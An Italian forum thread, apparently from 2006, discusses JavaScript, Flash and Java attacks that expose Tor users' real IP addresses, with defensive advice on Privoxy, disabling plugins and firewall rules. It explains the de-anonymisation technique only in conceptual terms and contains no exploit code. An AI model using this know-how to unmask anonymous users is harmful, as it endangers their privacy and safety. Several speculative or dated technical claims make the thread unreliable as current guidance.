            http://punto-informatico.it/pm.aspx?m_id=1804729&i
            Il PC non può essere visto come un
            elettrodomestico "normale", non è una TV o un
            frullatore o un forno a microonde. Non si può
            "premere sul pulsante di accensione e
            aspettare"... c'è bisogno di _capire_ come
            funziona per usarlo in modo
            corretto.
            Si vero, ma concorderai con me che disabilitare tre opzioni nel browser è sicuramente più semplice che mettersi a giocare con un firewall ^_^Poi Kerio non lo conosco quindi non so.
          • shamael scrive:
            Re: Attacco attraverso Javascript
            Io flash, per quanto vorrei poterne fare a meno, ce l'ho attivato. Tuttavia considerando i tempi di caricamento dei filmati non mi sembra che il plugin bypassi tor, almeno con firefox 2 su W2k. A quali sistemi operativi o browser ti riferisci?
          • shamael scrive:
            Re: Attacco attraverso Javascript
            Ho appena letto il pdf dell'attacco javascript/flash...credo di aver capito: il plug-in flash si connette direttamente se cosi' esplicitamente richiesto, ma non di default. O sbaglio?
          • Wakko Warner scrive:
            Re: Attacco attraverso Javascript
            - Scritto da: shamael
            Ho appena letto il pdf dell'attacco
            javascript/flash...credo di aver capito: il
            plug-in flash si connette direttamente se cosi'
            esplicitamente richiesto, ma non di default. O
            sbaglio?A questo non ti so rispondere, mi spiace.
          • Wakko Warner scrive:
            Re: Attacco attraverso Javascript
            - Scritto da: Wakko Warner

            - Scritto da: shamael

            Ho appena letto il pdf dell'attacco

            javascript/flash...credo di aver capito: il

            plug-in flash si connette direttamente se cosi'

            esplicitamente richiesto, ma non di default. O

            sbaglio?

            A questo non ti so rispondere, mi spiace.Allora, provo ad abbozzare una semi-risposta, non so però se è corretta.Immagino che il discorso funzioni così:Quando scarichi un video Flash è il _browser_ che te lo scarica quindi passi attraverso il suo proxy.Ma da Flash _immagino_ sia possibile attraverso i comandi interni all'animazione poter stabilire connessioni (chessò... magari per scaricare parti di animazione non scaricate precedentemente dal browser) e _queste_ non passano attraverso il proxy del browser.Quindi, in genere un'animazione Flash la scarichi usando il proxy del browser... ma è possibile costruire ad arte file flash che una volta scaricati cercano di connettersi bypassando le impostazioni del browser.Se ci sono errori qualcuno mi corregga...
          • Anonimo scrive:
            Re: Attacco attraverso Javascript
            - Scritto da: Wakko Warner
            Allora, provo ad abbozzare una semi-risposta, non
            so però se è
            corretta.
            Immagino che il discorso funzioni così:
            Quando scarichi un video Flash è il _browser_ che
            te lo scarica quindi passi attraverso il suo
            proxy.
            Ma da Flash _immagino_ sia possibile attraverso i
            comandi interni all'animazione poter stabilire
            connessioni (chessò... magari per scaricare parti
            di animazione non scaricate precedentemente dal
            browser) e _queste_ non passano attraverso il
            proxy del
            browser.

            Quindi, in genere un'animazione Flash la scarichi
            usando il proxy del browser... ma è possibile
            costruire ad arte file flash che una volta
            scaricati cercano di connettersi bypassando le
            impostazioni del
            browser.

            Se ci sono errori qualcuno mi corregga...io credo che utilizzi sempre il proxy configurato, altrimenti non funzionerebbe affatto lo scaricamento dinamico per tutti coloro che stanno in una lan con un gateway.Poi, magari, è possibile comandarlo in modo che ignori i proxy, ma questo non lo so.
          • shamael scrive:
            Re: Attacco attraverso Javascript
            Beh evidentemente se quell'attacco di cui si parlava ha effettivamente funzionato probabilmente le cose staranno come ha ipotizzato wakko. Questo per quanto riguarda piccole reti casalinghe, nel caso di reti aziendali con gateway la connessione diretta e' semplicemente impossibile.
          • Anonimo scrive:
            Re: Attacco attraverso Javascript
            - Scritto da: shamael
            Beh evidentemente se quell'attacco di cui si
            parlava ha effettivamente funzionato
            probabilmente le cose staranno come ha ipotizzato
            wakko. No.L'attacco era basato su un javascript che continuava a girare dopo aver disattivato Tor e riabilitato la normale connessione.Non ha nulla a che vedere con flash.A parte ciò, Javascript non ha metodi per ricavare l'ip di chi naviga, tuttavia, sotto firefox, javascript può invocare java (senza usare un'applet) e java può ricavare il vero indirizzo ip e comunicarlo (in realtà sul PC di test che avevo a disposizione veniva identificato il nome del PC e l'indirizzo IP che occupava nella sottorete, quindi non quello reale).Inoltre, a parte ciò che è possibile fare 'by design', javascript, java, flash, ecc... aumentano in modo esponenziale le possibilità di exploit illeciti.A questi aggiungiamo pure tutti i protocolli che potrebbero venire invocati dal browser (ftp, gopher, ...) e uttte le applicazioni che potrebbero partire (frontpage, client di posta, gestore del download).E sicuramente ci sono altre cose che non conosco.L'unico modo per usare TOR con un minimo di sicurezza è usare un browser minimale che non supporti altro che il rendering di pagine html (linx?)
          • shamael scrive:
            Re: Attacco attraverso Javascript

            No.
            L'attacco era basato su un javascript che
            continuava a girare dopo aver disattivato Tor e
            riabilitato la normale
            connessione.
            Non ha nulla a che vedere con flash.
            Eh, mica tanto...se leggi il pdf linkato da wakko (http://www.packetstormsecurity.org/0610-advisories/Practical_Onion_Hacking.pdf) parlano proprio dell'uso di flash dicendo addirittura di aver ottenuto risultati migliori che con solo javascript. Poi pero' non sono un programmatore e quindi non so leggere il codice specifico, quindi potrei anche sbagliarmi.
          • Anonimo scrive:
            Re: Attacco attraverso Javascript
            - Scritto da: shamael
            Eh, mica tanto...se leggi il pdf linkato da
            wakko parlano proprio dell'uso di flash dicendo
            addirittura di aver ottenuto risultati migliori
            che con solo javascript. Poi pero' non sono un
            programmatore e quindi non so leggere il codice
            specifico, quindi potrei anche sbagliarmi.Non hai capito... è ovvio che ogni plug in indebolisce il sistema (a meggior ragione quelli incapsulati in eseguibili quali flash e Acrobat), quello che volevo dire è che l'esempio di 'attacco ' che ha fatto wacco si basava sul solo JS.Lol alla fine suggerisce pure di usare Lynx, come avevo detto io (scherzando).Io continuerò usare un browser normale senza TOR :)
          • Wakko Warner scrive:
            Re: Attacco attraverso Javascript
            - Scritto da: shamael

            No.

            L'attacco era basato su un javascript che

            continuava a girare dopo aver disattivato Tor e

            riabilitato la normale

            connessione.

            Non ha nulla a che vedere con flash.



            Eh, mica tanto...se leggi il pdf linkato da wakko
            (http://www.packetstormsecurity.org/0610-advisorieSi, infatti il primo attacco, quello che avevo segnalato un mese e mezzo fa, usava per lo più Flash proprio perché evidentemente è più facile farlo uscire da Tor.Cmq... ho fatto rimuovere lo script che logga i vari IP http://scripts.mit.edu/~ecprice/iplogger.pl così almeno il danno è limitato. Ciò non toglie che questo attacco dimostra ancora una volta che Java, Javascript, Flash e ActiveX devono venire disabilitati. Per sicurezza io disabiliterei anche i vari plugin (tipo quelli per sentire musica dal WEB o video [realplayer, wmp, ecc]) perché potrebbero essere usati per attacchi simili.
          • Anonimo scrive:
            Re: Attacco attraverso Javascript
            - Scritto da: Wakko Warner

            - Scritto da: shamael


            No.


            L'attacco era basato su un javascript che


            continuava a girare dopo aver disattivato Tor
            e


            riabilitato la normale


            connessione.


            Non ha nulla a che vedere con flash.






            Eh, mica tanto...se leggi il pdf linkato da
            wakko


            (http://www.packetstormsecurity.org/0610-advisorie

            Si, infatti il primo attacco, quello che avevo
            segnalato un mese e mezzo fa, usava per lo più
            Flash proprio perché evidentemente è più facile
            farlo uscire da
            Tor.

            Cmq... ho fatto rimuovere lo script che logga i
            vari IP
            http://scripts.mit.edu/~ecprice/iplogger.pl

            così almeno il danno è limitato. Ciò non toglie
            che questo attacco dimostra ancora una volta che
            Java, Javascript, Flash e ActiveX devono venire
            disabilitati. Per sicurezza io disabiliterei
            anche i vari plugin (tipo quelli per sentire
            musica dal WEB o video [realplayer, wmp, ecc])
            perché potrebbero essere usati per attacchi
            simili.
            Se cliccando su un file nella pagina del browser si avvia mediaplayer o il client di posta, c'è il pericolo di un collegamente che bypassi Tor?
          • Anonimo scrive:
            Re: Attacco attraverso Javascript
            - Scritto da:

            Se cliccando su un link di posta elettronica ti
            parte Thunderbird, questo manda il tuo Ip
            reale?no, a meno che:-ti scappi il click sul tasto invia-esista e venga usato un epxloit del client-automatismi particolari:Per esempio un link di posta elettronica ti può compilare automaticamente destinatario, oggetto e altre cose.Se nel campo oggetto ci fosse un link ad un'immagine e tu hai un automatismo (per esempio un'estensione) che ne visualizza automaticamente l'anteprima...
          • Anonimo scrive:
            Re: Attacco attraverso Javascript
            Se parte il Client di posta questo mica si collega al sito internet che appare nel browser, semplicemente si avvia... O sbaglio?
          • Anonimo scrive:
            Re: Attacco attraverso Javascript
            - Scritto da:
            Se parte il Client di posta questo mica si
            collega al sito internet che appare nel browser,
            semplicemente si avvia... O
            sbaglio?certo.Ma devi pensare di fare i conti con eventuali exploit o errori umani (ti parte un click).Quindi la situazione migliore è un puro motore di rendering html che non invochi nulla di esterno.
      • Anonimo scrive:
        Re: Attacco attraverso Javascript
        E' sufficiente chiudere il browser prima di Tor per usare javascript con una certa sicurezza di anonimato?Personalmente (sia per pigrizia sia perché utilizzo due browser, per non dovere configurare ogni volta) con linux lascio tor sempre acceso quindi il problema non si porrebbe nemmeno.Flash non l'ho nemmeno installato, sia perché è uno schifoso programma proprietario che sta imprigionando la rete sia perché mi sembra ingestibile.Non c'è un'alternativa a flashplayer?
        • Wakko Warner scrive:
          Re: Attacco attraverso Javascript
          - Scritto da:
          E' sufficiente chiudere il browser prima di Tor
          per usare javascript con una certa sicurezza di
          anonimato?Non lo so. Per questo suggerisco di disattivarlo.
          Non c'è un'alternativa a flashplayer?http://www.gnu.org/software/gnash/Ma non so come sta messo riguardo a sicurezza.
        • Anonimo scrive:
          Re: Attacco attraverso Javascript
          - Scritto da:
          E' sufficiente chiudere il browser prima di Tor
          per usare javascript con una certa sicurezza di
          anonimato?Questa domanda non ha una risposta.Non ci sono metodi diretti in JS per ricavare l'IP, ma JS permette di inventarsene di indiretti (più o meno funzionanti) e ti mette comunque allo scoperto da improbabili ma non impossibili exploit.
    • Anonimo scrive:
      Re: Chissà cosa sperano di ottenere
      A proposito, un suggerimento... quando usate Tor,
      usate SEMPRE Privoxy e, nel file di
      configurazione di Privoxy impedite il caricamento
      di Flash. Nel browser disabilitate sia Java che
      Javascript e assicuratevi che il vostro browser
      non spedisca i siti che visitate in giro (cosa
      che accade con estensioni tipo quella per
      visualizzare il Pagerank di Google o Alexa o tipo
      lo strumento anti-phishing di FF2). Esistono
      attacchi che sono in grado di rivelare il vostro
      IP se o Flash o Java o Javascript sono
      attivati.Chi ha un firewall che lo consente, può mettere una regola che permette ("allow") le connessioni verso 127.0.0.1, e impedisce ("deny") qualsiasi altra connessione.
    • Anonimo scrive:
      Re: Chissà cosa sperano di ottenere
      - Scritto da: Wakko Warner
      A proposito, un suggerimento... quando usate Tor,
      usate SEMPRE Privoxy e, nel file di
      configurazione di Privoxy impedite il caricamento
      di Flash. Nel browser disabilitate sia Java che
      Javascript e assicuratevi che il vostro browser
      non spedisca i siti che ...si ma wakko, ci sono MIGLIAIA di siti che semplicemente non funzionano, in questo modo.lo so che possiamo lamentarci sulla scarsa professionalità di chi li ha prodotti: ma tant'è: non vanno.e allora che si fa?io normalmente tengo disabilitate tutte e tre le cose che hai detto, e non uso tor, lo faccio per principio.però periodicamente ON unoON dueON treli devo riaccendere per poter usare i siti che mi servono.
      • Wakko Warner scrive:
        Re: Chissà cosa sperano di ottenere
        - Scritto da:
        si ma wakko, ci sono MIGLIAIA di siti che
        semplicemente non funzionano, in questo
        modo.Si, hai ragione, ma fra questi migliaia di siti ci sono anche i siti per cui necessiti Tor?Cmq, su questo non ci si può fare nulla... finché la gente continuerà a costruire siti inaccessibili mettendo javascript ovunque e in tutte le salse o peggio ancora Flash...Tor è utile per due ragioni:1) quando vuoi accedere a contenuti "pericolosi" o esprimere idee "pericolose" (per te stesso per esempio)2) per impedire ai log di Stato di loggare le tue abitudini di navigazioneNel primo caso ti conviene avere Flash, Javascript, Java e ActiveX disabilitati. Disattiverai Tor e ripristinerai Flash, ecc una volta finito quello che dovevi fare (anzi... è addirittura meglio che ci dedichi un browser apposta così non devi stare troppo a giocare con le impostazioni).Nel secondo caso questo non è così importante perché quello che interessa a te è semplicemente sfuggire ai log degli ISP e anche se qualche buon tempone ti becca il tuo IP reale una volta ogni tanto non ha importanza.Dipende tutto dal perché Tor ti serve.
    • Anonimo scrive:
      Re: Chissà cosa sperano di ottenere
      A proposito, un suggerimento... quando usate Tor,
      usate SEMPRE Privoxy e, nel file di
      configurazione di Privoxy impedite il caricamento
      di Flash. Nel browser disabilitate sia Java che
      Javascript e assicuratevi che il vostro browser
      non spedisca i siti che visitate in giro (cosa
      che accade con estensioni tipo quella per
      visualizzare il Pagerank di Google o Alexa o tipo
      lo strumento anti-phishing di FF2). Esistono
      attacchi che sono in grado di rivelare il vostro
      IP se o Flash o Java o Javascript sono
      attivati.Il suggerimento vale anche per torpark?
      • Wakko Warner scrive:
        Re: Chissà cosa sperano di ottenere
        - Scritto da:
        Il suggerimento vale anche per torpark? Non so, non l'ho mai usato. Se non erro altro non è un Firefox con Tor integrato... ma le mie domande sono:1) Impedisce a Flash di visualizzarsi?2) Impedisce a Java, ActiveX e Javascript di entrare in funzione?3) Elimina le informazioni del browser quando visiti i siti (user agent, referring-link, sistema operativo, ecc)?
        • Anonimo scrive:
          Re: Chissà cosa sperano di ottenere
          L'unico dubbio riguarda la risoluzione degli indirizzi, potresti controllare? Sono tra quegli utenti che sanno usare la macchina ma non conoscono il motore!
          • Wakko Warner scrive:
            Re: Chissà cosa sperano di ottenere
            - Scritto da:
            L'unico dubbio riguarda la risoluzione degli
            indirizzi, potresti controllare? Sono tra quegli
            utenti che sanno usare la macchina ma non
            conoscono il
            motore!http://www.torrify.com/forum/viewtopic.php?p=1987Qui dice che la risoluzione degli indirizzi (DNS-
            IP) è fatta tramite Tor.Se vuoi essere sicuro, visto che torpark usa Firefox, immagino che usi l'opzione "nascosta" di Firefox "network.proxy.socks_remote_dns".Sulla barra degli indirizzi scrivi "about:config" (senza apici) e verifica che quell'opzione sia a "true" (no apici).Però lo stesso... senza Privoxy, senza disabilitare Flash/Javascript/Java/ActiveX e senza rimuovere referring-link, user-agent, versione, ecc non mi sembra sicurissimo... poi... come dicevo... non so cosa torpark implementa o meno... leggevo in un altra risposta che ha delle extension per impedire l'esecuzione di script... chissà se basta però.-----------------------------------------------------------Modificato dall' autore il 11 dicembre 2006 14.55-----------------------------------------------------------
          • Anonimo scrive:
            Re: Chissà cosa sperano di ottenere
            appunto, mi dicevo, senza privoxy come fa a nascondere gli indirizzi all'ISP?
      • Anonimo scrive:
        Re: torpark

        A proposito, un suggerimento... quando usate
        Tor,

        usate SEMPRE Privoxy e, nel file di

        configurazione di Privoxy impedite il
        caricamento

        di Flash. Nel browser disabilitate sia Java che

        Javascript e assicuratevi che il vostro browser

        non spedisca i siti che visitate in giro (cosa

        che accade con estensioni tipo quella per

        visualizzare il Pagerank di Google o Alexa o
        tipo

        lo strumento anti-phishing di FF2). Esistono

        attacchi che sono in grado di rivelare il vostro

        IP se o Flash o Java o Javascript sono

        attivati.

        Il suggerimento vale anche per torpark? Ho trovato due pagine, serve però l'interprete:http://www.torrify.com/forum/viewtopic.php?p=2080&sid=6c793fb14c8c181c190128da846a703bhttp://www.torrify.com/forum/viewtopic.php?p=1987&sid=705faf61cf1e6f72bc225547c13e421b
    • Anonimo scrive:
      Re: Chissà cosa sperano di ottenere

      Non serve ad individuare gli utenti.
      Non serve in alcun modo a ricavare informazioni
      di qualunque utilità per le
      indagini.scusa ma il MAC Address della scheda di retecon tor viene camuffato?il MAC Address viene trasmesso? c'è chi dice si c'è chi dice nosarebbe importante saperlo...
      • Wakko Warner scrive:
        Re: Chissà cosa sperano di ottenere
        - Scritto da:

        Non serve ad individuare gli utenti.

        Non serve in alcun modo a ricavare informazioni

        di qualunque utilità per le

        indagini.


        scusa ma il MAC Address della scheda di rete
        con tor viene camuffato?

        il MAC Address viene trasmesso? c'è chi dice si
        c'è chi dice
        no

        sarebbe importante saperlo...Perché dovrebbe spedire il mac-address? È completamente inutile spedirlo... su Internet viaggia solo il tuo IP, il MAC Address è usato solo internamente alle reti per spostare i pacchetti IP da un computer all'altro ma in genere non escono dalla rete in cui si trovano perché è del tutto inutile che lo facciano visto che sarebbe un'informazione in più senza alcuno scopo.Ti faccio vedere:[code][root@Avalon luca]# arping 192.168.*.** -I eth1ARPING 192.168.*.** from 192.168.*.** eth1Unicast reply from 192.168.*.** [**:**:**:**:**:**] 3.990msUnicast reply from 192.168.*.** [**:**:**:**:**:**] 3.827msUnicast reply from 192.168.*.** [**:**:**:**:**:**] 4.026msUnicast reply from 192.168.*.** [**:**:**:**:**:**] 3.716msSent 4 probes (1 broadcast(s))Received 4 response(s)[/code]Qui risponde, ovviamente, perché sto "arpingando" un IP interno alla mia LAN. [Ovviamente ho asteriscato il MAC]Ma qui non risponde perché lo sto facendo su un IP esterno alla mia LAN e quindi non ha modo per eseguire il comando:[code][root@Avalon luca]# arping 195.210.91.83 -I eth1ARPING 195.210.91.83 from 192.168.*.** eth1Sent 15 probes (15 broadcast(s))Received 0 response(s)[/code]
    • Gatto Selvaggio scrive:
      Ma se
      Ma se mi collegassi usando una macchina virtuale che effettua OGNI comunicazione esclusivamente tramite TOR, e tale macchina virtuale fosse in esecuzione su un sistema operativo dotato delle sole funzionalità per la connessione a TOR, caricato nella RAM, con un demone che avvisa se viene scritto nella RAM qualcosa non firmato digitalmente dal sistema operativo...pant pantle operazioni degli iframe e flash malevoli non passerebbero anch'esse per la rete TOR?Questo indipendentemente dal fatto che tali comunicazioni malevole contengano dati sulla mia macchina carpiti usando funzionalità di Flash/JavaScript - problema da affrontare separatamente.Per le comunicazioni davvero riservate mando un mio uomo a nuoto al di là dell'oceano con un pizzino.
      • Anonimo scrive:
        Re: Ma se

        Per le comunicazioni davvero riservate mando un
        mio uomo a nuoto al di là dell'oceano con un
        pizzino.mmhhm... comincio a capire perchè ormai di gatti selvaggi non se ne trovano più (come i pizzini del resto)...È ovvio che non possono che estinguersi.... :| :|Molto meglio un gatto domestico "rinselvatichito" come quelli belli "scafati" chi si trovano ai fori imperiali! :p :p
      • Wakko Warner scrive:
        Re: Ma se
        - Scritto da: Gatto Selvaggio
        Ma se mi collegassi usando una macchina virtuale
        che effettua OGNI comunicazione esclusivamente
        tramite TOR, e tale macchina virtuale fosse in
        esecuzione su un sistema operativo dotato delle
        sole funzionalità per la connessione a TOR,
        caricato nella RAM, con un demone che avvisa se
        viene scritto nella RAM qualcosa non firmato
        digitalmente dal sistema
        operativo...

        pant pant

        le operazioni degli iframe e flash malevoli non
        passerebbero anch'esse per la rete
        TOR?Se usi una macchina virtuale e impedisci ad essa qualunque comunicazione al di fuori di Tor si, dovrebbe funzionare.Cmq, io pensavo ad una soluzione di questo tipo:http://www.linutop.com/opportunamente modificata installandoci su Tor, Privoxy, Truecrypt e disabilitando tutto nel browser (Java, Javascript, Flash e plugin vari) e un bel firewall per impedire qualsiasi comunicazione al di fuori di Tor.È molto piccolo, lo si può tenere ovunque, consuma credo sui 10W o giù di lì, non ha disco fisso quindi non memorizza nulla e attraverso l'USB vi si può collegare dischi truecrypt per salvare eventuali dati in modo sicuro.Il prezzo non lo so, ma non credo si discosterà molto dai 150 euro... anche perché altrimenti i Mini-ITX diventano più convenienti e più potenti.
        • Gatto Selvaggio scrive:
          Re: Ma se


          Ma se mi collegassi usando una macchina virtuale

          che effettua OGNI comunicazione esclusivamente

          tramite TOR, e tale macchina virtuale fosse in

          esecuzione su un sistema operativo dotato delle

          sole funzionalità per la connessione a TOR,

          caricato nella RAM, con un demone che avvisa se

          viene scritto nella RAM qualcosa non firmato

          digitalmente dal sistema

          operativo...
          Se usi una macchina virtuale e impedisci ad essa
          qualunque comunicazione al di fuori di Tor si,
          dovrebbe funzionare.
          Cmq, io pensavo ad una soluzione di questo tipo:
          http://www.linutop.com/
          opportunamente modificata installandoci su Tor,
          Privoxy, Truecrypt e disabilitando tutto nel
          browser (Java, Javascript, Flash e plugin vari) e
          un bel firewall per impedire qualsiasi
          comunicazione al di fuori di
          Tor.Però poi mi è venuto in mente questo:http://punto-informatico.it/f/m.aspx?m_id=1805652&m_rid=0ma ho ricevuto risposte un po' trollose.
          • tdimax scrive:
            Re: Ma se
            Secondo me la cosa migliore è usare una versione "portable" di firefox adeguatamente configurata per usare sempre tor e disabilitare determinate funzioni.Una specie di browser che uso solo quando voglio essere sicuro al 100% di essere sotto rete tor...
Chiudi i commenti